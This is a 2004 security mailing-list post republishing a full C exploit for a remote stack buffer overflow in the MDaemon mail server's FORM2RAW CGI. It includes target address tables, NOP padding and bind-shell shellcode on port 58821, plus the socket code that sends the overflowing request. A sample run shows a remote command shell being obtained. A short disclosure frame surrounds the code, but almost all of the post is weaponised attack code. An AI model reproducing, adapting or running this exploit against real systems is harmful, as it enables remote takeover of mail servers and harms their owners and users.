[EXPL] Remote Buffer Overflow in MDaemon (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/16/04
- Previous message: SecuriTeam: "[NEWS] WS_FTP Pro ASCII Directory Transfer Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 16 Mar 2004 13:06:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Remote Buffer Overflow in MDaemon (Exploit)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/windowsntfocus/5ZP050ABPY.html> Remote Buffer
Overflow in MDaemon (Raw Message Handler), a vulnerability in MDaemon
allows remote attackers to overflow an internal buffer, cause the EIP to
change, thus allowing the attacker to cause the program to execute
arbitrary code.
DETAILS
Exploit:
/*
Copyright ? Rosiello Security
http://www.rosiello.org
================
<rave> ____________
<rave> _.-----------------------/ `-,,
<rave> ,' ; ; / `-._
<rave> ; ; ; .') \ `\
<rave> `--------------------.'.' _.-'`- . `\
<rave> ;`---'-------.\, `\ _
<rave> ;, ; .---`, ` -
<rave> ;` ; `.____;
<rave> `--------------'_ ,,
<rave> ,; ; .---`, ` ._
<rave> ;; ; `.____; ___``````
<rave> `;--------------' `
<rave> ,; ; .---`,
<rave> ;; ; `.____;
<rave> `.------------'
<rave> ``----...__ _..=
<rave> `````---=-.---``'`
_
| |_
|_ _|
|_|
/\ \ We /\ \ are /\ \
/::\ \ Black /::\ \ H@t \:\ \
/:/\:\ \ /:/\:\ \ \:\ \
_::\~\:\ \ _::\~\:\ \ /::\ \
/\ \:\ \:\__\ /\ \:\ \:\__\ /:/\:\__\
\:\ \:\ \/__/ \:\ \:\ \/__/ /:/ \/__/
\:\ \:\__\ \:\ \:\__\ /:/ /
\:\/:/ / \:\/:/ / /:/ /
\::/ / \::/ / /:/ /
\/__/ \/__/ \/__/ airsupply@0x557.org
http://www.0x557.org
================
--== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==--
Code by: rave
Contact: rave@rosiello.org
Contact: airsupply@0x557.org
Date: March 2004
Bug found by: hat-squad security ( great job !! )
MDaemon offers a full range of mail server functionality. MDaemon
protects your users from
spam and viruses, provides full security, includes seamless web access to
your email via
WorldClient, remote administration, and much more!".FORM2RAW.exe is a CGI
that allows users
to send emails using the MDaemon via a web page. It processes the fields
of an HTML form and
creates a raw message file in the raw queue directory of MDaemon mail
server. This file then
will be processed and queued for delivery by MDaemon. An attacker can
cause a buffer overflow
in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.
According to the Help file "By default, MDaemon 6.52 or higher will not
send emails created by
Form2Raw unless the email address passed in the 'from' tag (see below) is
a valid account on the
MDaemon server. If you want to disable this behavior you can set the
FromCheck=No in FORM2RAW.INI
file".
Sending more than 153 bytes in the "From" field to FROM2Raw.exe
creates a raw file that when processed
by MDaemon will cause a Stack buffer overflow. The EIP register will be
overwritten when the From field
length is 249 bytes
Do i need to say more ? this is 0wnage 0ldsch00l style have fun..
This spawns a waiting bindshell on the victims computer at port 58821..
ps:
The exploit has only been tested on Windows XP Home and pro edition
(dutch) sp1 + the stack
has been proofen to be verry humpy. So please dont yell it me if the
exploit doesn't work on your
Operative System .. thanks
The demo mode of the exploit shows in the debugger the following
EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI =
014C6000 EDI = 01AEF1A8
EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668
Note:Demo mode works on all operative systems
Usage <C:\Mdeamon>Mdeamon_exp.exe <target host> <target number>
Target Number Target Name Stack Adress
============= =========== ===========
0 Demo 0x42424242
1 Windows XP HOME [NL] 0x014D4DFC
2 Windows XP PRO [NL] 0x014D4DFC
<C:\Mdeamon> Mdeamon_exp localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost:3000
[+] socket inalized
[+] Overflowing string is Prepared
[+] Connected
[+] Overflowing string had been send
<C:\> telnet localhost 58821
Microsoft Windows XP [versie 5.1.2600]
C) Copyright 1985-2001 Microsoft Corp.
D:\MDaemon\APP>
Special Thanks to:
airsuppy { 0x557 security r0cked me, ty for u part and cooperationg bro }
Silicon { Unofficial source`s told me ur a rosiello member good i lent ur
bindcode TY 100% }
Sam { once again 0x557 ty for the chat aldo it was a short one }
Dragnet { Always willing to help me out }
Angelo { Verry verry good friend }
Punix { Last time i forgot you girl ! :( im so sorry }
Greetz go out to:
NrAziz { This is my brother anyone who touches him touches me, so pls
make my day ! }
sloth { good guy }
Mercy { Hope to see u soon }
Netric security { www.netric.org/.be }
0x557 security (SST) { www.0x557.org }
[+] All the hax0rs i forgot.
This was rosiello there first coorperation with the 0x557 ppl witch have
been proofen to be
realy nice, in the past rosiello has worked with (now death) DSR also
known as dtors
security research, but (and its a personal wish) hope that 0x557 still
will be so nice for
us. I feel my self called to give a great big shoutout to these ppl for
there work for now and
in the futhure !! keep on doing the great job !.
Bad sounds of these days {
i cant remember anything , can`t tell of this is trough or a dream. deep
down down inside me i ,
feel the stream this terrable silence stop with me. Now that the warn is
trough with me im waking
up i can not see that there is nothing left of me nothing is real but
pain now.
}
The original advisory can be found at:
http://hat-squad.com/bugreport/mdaemon-raw.txt
The mirored advisory can be fount at:
http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm
Our own Advisory can be found at :
http://www.rosiello.org/en/read_bugs.php?17
!!!DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
Respect the law as we do!
I'm outa here bye bye !
*/
#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>
// Darn fucking 1337 macro ***
#define ISIP(m) (!(inet_addr(m) ==-1))
#define offset 267 //;267 //1024
// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"
struct sh_fix
{
unsigned long _wsasock;
unsigned long _bind;
unsigned long _listen;
unsigned long _accept;
unsigned long _stdhandle;
unsigned long _system;
} ;
struct remote_targets {
char *os;
unsigned long sh_addr;
struct sh_fix _sh_fix;
} target [] ={
/* Option`s for your eyes only :D*/
"Demo ",
0x42424242,
{ 0x90909090,
0x90909090,
0x90909090,
0x90909090,
0x90909090,// <--
0x90909090,
},
"Windows XP HOME [NL]",
0x014D4DFC,
{ 0x71a35a01,
0x71a33ece,
0x71a35de2,
0x71a3868d,
0x77e6191d,// <--
0x77bf8044,
},
"Windows XP PRO [NL]",
0x014D4DFC,
{ 0x71a35a01,
0x71a33ece,
0x71a35de2,
0x71a3868d,
0x77e6191d,// <--
0x77bf8044,
}
};
unsigned char _addy [] =
"\x90\x90\x90\x90";
// 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =
"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";
/* The funny thing is while exploiting this bug one of the adresses
(see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space)
to fix this i wrote
this addy/mini shellcode tho replace the 0x19 (thats not supposed to be
there) in the
SetStdHandle () adress inside the shellcode for an 0x20.
*/
unsigned char _me [] =
"\x33\xC9" // xor ecx,ecx
"\xBE\xAA\xAA\xAA\xAA" // mov esi,offset _shellcode (00421a50)
"\x83\xC1\x1F" // add ecx,1Fh
"\x41" // inc ecx
"\x66\x89\x4E\x50" // mov word ptr [esi+50h],cx
"\xC6\x46\x51\xE6"; // mov byte ptr [esi+51h],0E6h
// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
{
struct hostent *hp;
if (ISIP(hostname)) return inet_addr(hostname);
if ((hp = gethostbyname(hostname))==NULL)
{ perror ("[+] gethostbyname() failed check the existance of the
host.\n");
exit(-1); }
return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
}
int fix_shellcode ( int choise )
{
unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);
memcpy(_me+3,((char *)&only_xp),4);
//0xf offset to the adres of WSASocketA
memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);
//0x30 offset to the adres of bind
memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);
//0x3a offset to the adres of listen
memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);
//0x46 offset to the adres of _accept
memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);
//0x4f offset to the adres of SetStdHandle
memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);
//0x6e offset to the adres of SYSTEM
memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);
return 0;
}
/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage (char *what)
{
int i;
fprintf(stdout,"Copyright ? Rosiello Security\n");
fprintf(stdout,"http://www.rosiello.org\n\n");
fprintf(stdout,"Usage %s <target host> <target number>\n",what);
fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");
for (i=0;i < 3;i++)
fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr);
exit(0);
}
int main(int argc,char **argv)
{
char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
int sd,oops,i,choise;
struct sockaddr_in ooh;
WSADATA wsadata;
WSAStartup(0x101, &wsadata);
if (argc < 2) usage(argv[0]);
address=argv[1];
choise=atoi(argv[2]);
fix_shellcode(choise);
fprintf(stdout,"[+] Winsock Inalized\n");
/* Lets start making a litle setup
Change the port if you have to */
ooh.sin_addr.s_addr = inet_addr(get_ip(address));
ooh.sin_port = htons(3000);
ooh.sin_family = AF_INET;
fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);
// ok ok here`s ur sock()
sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }
fprintf(stdout,"[+] socket inalized\n");
/* inalizing the expploiting buffer read the file comments for the
details */
ptr=buffer+strlen(buffer);
for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;
sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);
//memcpy(buffer+35,shellcode,strlen(shellcode));
fprintf(stdout,"[+] Overflowing string is Prepared\n");
// Knock knock ... hi i want to hook up with you
oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }
// yep wher`e in :D
fprintf(stdout,"[+] Connected\n");
// Sending some Dangerous stuff
i = send(sd,buffer,strlen(buffer),0);
if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }
fprintf(stdout,"[+] Overflowing string had been send\n");
// Bring in the cleaners !!
WSACleanup();
// [EOF]
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:angelo.rosiello@katamail.com> Angelo Rosiello.
The original article can be found at:
<http://www.rosiello.org/archivio/mdaemon-exploit.c>
http://www.rosiello.org/archivio/mdaemon-exploit.c
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] WS_FTP Pro ASCII Directory Transfer Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
